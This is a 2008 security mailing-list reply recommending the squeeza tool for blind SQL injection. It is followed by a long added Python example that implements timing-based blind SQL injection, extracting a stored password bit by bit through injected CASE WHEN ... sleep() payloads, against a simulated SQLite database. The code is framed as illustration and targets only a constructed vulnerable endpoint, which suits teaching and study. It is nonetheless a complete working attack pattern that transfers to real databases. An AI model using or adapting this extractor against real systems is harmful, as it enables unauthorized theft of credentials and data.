Hey guys..
* On 19/08/2008, [at 14:38:55 +0100] Ferruh Mavituna [ferruh_at_mavituna.com] seemed to say:
>This is a short whitepaper about a new way to exploit Blind SQL
>Injections. It's implemented in BSQL Hacker (
>http://labs.portcullis.co.uk/application/bsql-hacker/ ).
>
>It is possible to gather information from a target server with a 66%
>reduction in the number of requests made of the server (compared to
>normal Blind SQL Injection), requiring two rather than six requests to
>retrieve each char.
If you like, you can also check out squeeza
[http://www.sensepost.com/research/squeeza/] and its associated
whitepaper
[http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pdf].
squeeza also allowed SQL injection attacks to extract info via
DNS/timing/error messages, but its timing method extracted data one
bit at a time with retransmits/state control, effectively allowing for
full binary-safe data transfer from the injectable DB.
squeeza is written in Ruby and is not as pretty as BSQL Hacker, but in
its defense it _did_ have an ASCII-art logo..
/mh
--
Haroon Meer, SensePost Information Security |
http://www.sensepost.com/blog/
PGP: http://www.sensepost.com/pgp/haroon.txt | Tel: +27 83786 6637
Received on Aug 21 2008
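The bit-at-a-time timing extraction Haroon mentions, as an added example (this is illustration code written for this page, not squeeza's or BSQL Hacker's own code). A constructed in-memory SQLite database with a registered sleep() function stands in for a SLEEP()-capable backend, VulnerableApp is a hypothetical endpoint that concatenates input straight into SQL, and the attacker recovers the secret one bit per request from elapsed time alone, re-requesting any sample that lands in an ambiguous timing band rather than trusting it. The 0.03 s delay, the 25%/75% decision bands, the table and column names and the sample secret are all assumptions.

```python
"""Bit-at-a-time, timing-based blind SQL injection against a simulated
vulnerable endpoint. Added illustration; not squeeza's or BSQL Hacker's code."""
import sqlite3
import time

TRUE_DELAY = 0.03  # seconds the injected condition stalls the query when true (assumed)


def _sleep_udf(seconds):
    """Stand-in for a SLEEP() function: SQLite has none, so register one."""
    time.sleep(seconds)
    return 0


def make_db():
    """Constructed sample database with one secret worth stealing (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, _sleep_udf)
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cr')")
    conn.commit()
    return conn


class VulnerableApp:
    """Hypothetical endpoint that concatenates user input into SQL and returns
    nothing useful to the caller: the only observable is elapsed time."""

    def __init__(self, conn):
        self.conn = conn

    def lookup(self, user_input):
        sql = "SELECT name FROM users WHERE name = '" + user_input + "'"
        self.conn.execute(sql).fetchall()


class TimingExtractor:
    """Pulls one bit per request by timing the response; samples in the
    ambiguous band are re-requested (the 'retransmit' idea) instead of trusted."""

    def __init__(self, send, delay=TRUE_DELAY):
        self.send = send          # callable(payload); the attacker only times it
        self.delay = delay
        self.requests = 0

    def payload(self, pos, bit):
        # Condition: bit <bit> of the <pos>-th byte of the secret is set.
        # substr() past the end yields '' and unicode('') is NULL, which
        # coalesce() turns into 0, so a position past the end reads as all-zero
        # bits and acts as a natural terminator.
        cond = (
            "((coalesce(unicode(substr((SELECT pw FROM users WHERE id = 1), %d, 1)), 0)"
            " >> %d) & 1) = 1" % (pos, bit)
        )
        # The trailing '-- ' comments out the application's closing quote.
        return "x' OR CASE WHEN %s THEN sleep(%s) ELSE 0 END -- " % (cond, self.delay)

    def probe(self, pos, bit):
        self.requests += 1
        t0 = time.perf_counter()
        self.send(self.payload(pos, bit))
        return time.perf_counter() - t0

    def read_bit(self, pos, bit, max_tries=3):
        elapsed = 0.0
        for _ in range(max_tries):
            elapsed = self.probe(pos, bit)
            if elapsed >= 0.75 * self.delay:
                return 1
            if elapsed <= 0.25 * self.delay:
                return 0
            # Landed between the bands (jitter, load): ask again.
        return 1 if elapsed >= 0.5 * self.delay else 0

    def read_byte(self, pos):
        # Eight bits per byte, so the transfer is binary-safe, not ASCII-only.
        return sum(self.read_bit(pos, b) << b for b in range(8))

    def extract(self, max_len=64):
        out = bytearray()
        for pos in range(1, max_len + 1):
            value = self.read_byte(pos)
            if value == 0:   # past the end of the secret
                break
            out.append(value)
        return bytes(out)


def steal_password():
    """Run the attack end to end; returns (recovered bytes, requests sent)."""
    app = VulnerableApp(make_db())
    extractor = TimingExtractor(app.lookup)
    secret = extractor.extract()
    return secret, extractor.requests


if __name__ == "__main__":
    recovered, count = steal_password()
    print("recovered %r in %d requests" % (recovered, count))
```

Note the cost model: one bit per request means eight requests per byte before any retries, which is the price of getting arbitrary bytes back reliably; the retry-on-ambiguity loop is only the simplest form of the retransmit/state-control idea, and squeeza's actual protocol is not reproduced here.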